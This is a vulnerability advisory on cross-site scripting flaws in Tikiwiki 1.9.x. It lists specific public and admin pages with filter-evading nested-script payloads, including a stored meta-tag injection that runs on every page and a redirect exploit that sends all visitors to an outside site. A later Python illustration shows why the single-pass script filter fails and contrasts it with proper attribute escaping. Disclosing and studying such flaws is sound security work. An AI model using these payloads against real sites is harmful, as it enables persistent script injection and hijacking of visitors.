Multiple XSS Vulnerabilities in Tikiwiki 1.9.x
Discovered by Blwood
http://www.blwood.net
Public
tiki-lastchanges
tiki-orphan_pages.php
tiki-listpages.php
tiki-remind_password.php
http://tikiwiki.org/tiki-remind_password.php
"><scr<script>ipt>alert('Blwood')</scr</script>ipt>
Admin
tiki-admin_include_metatags.php
http://www.site.com/tiki-admin.php?page=metatags
"><sc<script>ript>alert('Blwood')</scr</script>ipt>
The filter strips only one <script>/</script> pair, so the remaining fragments reassemble and the source of every page then contains:
<meta name="keywords" content=""><script>alert('Blwood')</script>" />
Because the meta tag is emitted in the header of every page, the script executes on every page of the site.
Exploit (redirects every visitor):
"><sc<script>ript>document.location='http://www.blwood.net'</scr</script>ipt>
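The following is an added illustration written for this page, not Tikiwiki code. The advisory only shows the filter's output, so the single-pass regex stripper below is an assumed model of the vulnerable behaviour; the meta-tag template, the function names and the check for a live script element are likewise hypothetical. It reproduces the reassembly shown above, then contrasts two fixes: re-applying the blocklist until nothing changes (which still lets the payload break out of the attribute) and contextual output encoding (which is the actual fix).

```python
import html
import re

# Constructed payload of the shape used throughout this advisory.
PAYLOAD = "\"><scr<script>ipt>alert('Blwood')</scr</script>ipt>"

# Matches a literal <script ...> or </script ...> tag.
_SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)


def strip_script_once(value):
    """Assumed model of the weak filter: remove every literal <script> and
    </script> tag in a single pass and return whatever is left.  The nested
    payload survives because the removed tags leave '<scr' + 'ipt>' behind."""
    return _SCRIPT_TAG.sub("", value)


def strip_script_fixpoint(value):
    """Same blocklist applied until the input stops changing.  This defeats
    the nested-tag trick but is still a blocklist: the leading '">' survives
    and still terminates the attribute."""
    while True:
        stripped = _SCRIPT_TAG.sub("", value)
        if stripped == value:
            return stripped
        value = stripped


def render_meta_keywords(value, sanitizer):
    """Hypothetical template for the <meta> tag the advisory shows, emitting
    the admin-supplied keywords after the chosen sanitizer has run."""
    return '<meta name="keywords" content="%s" />' % sanitizer(value)


def render_meta_keywords_escaped(value):
    """Correct fix: encode for the HTML attribute context instead of trying
    to strip tags.  quote=True also encodes the double quote, so the value
    can no longer close the content="" attribute."""
    return '<meta name="keywords" content="%s" />' % html.escape(value, quote=True)


def contains_live_script(markup):
    """True if the rendered markup carries a real <script>...</script> element."""
    return re.search(r"<script[^>]*>.*?</script>", markup,
                     re.IGNORECASE | re.DOTALL) is not None


def breaks_out_of_attribute(markup):
    """True if anything other than the closing '" />' ends the content attribute,
    i.e. the injected value contains a raw double quote."""
    inner = markup.split('content="', 1)[1].rsplit('" />', 1)[0]
    return '"' in inner


if __name__ == "__main__":
    for name, page in (("single pass", render_meta_keywords(PAYLOAD, strip_script_once)),
                       ("fixpoint", render_meta_keywords(PAYLOAD, strip_script_fixpoint)),
                       ("escaped", render_meta_keywords_escaped(PAYLOAD))):
        print("%-11s script=%-5s attr_broken=%-5s %s" % (
            name, contains_live_script(page), breaks_out_of_attribute(page), page))
```

Running it shows the single-pass output is byte-for-byte the line quoted above; the fixpoint variant removes the script but still leaves `">alert('Blwood')` breaking out of the attribute, so an attacker can move to any other tag or event handler; only the escaped rendering keeps the value inside the attribute.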
tiki-admin_ressmodules.php
tiki-syslog.php
tiki-adminusers.php
In the form:
"><scr<script>ipt>alert('Blwood')</scr</script>ipt>
tiki-admin_hotwords.php
"><sc<script>ript>alert('Blwood')</scr</script>ipt>
tiki-admin_modules.php
Assign new module
Parameters: "><sc<script>ript>alert('Blwood')</scr</script>ipt>
Create new user module
Name: "><sc<script>ript>alert('Blwood')</scr</script>ipt>
tiki-admin_notifications.php
Add notification:
"><sc<script>ript>alert('Blwood')</scr</script>ipt>
tiki-admin_dsn.php
Name: "><sc<script>ript>alert('Blwood')</scr</script>ipt>
Dsn: "><sc<script>ript>alert('Blwood')</scr</script>ipt>
tiki-admin_content_templates.php
Create new template:
Name: "><sc<script>ript>alert('Blwood')</scr</script>ipt>
tiki-admin_chat.php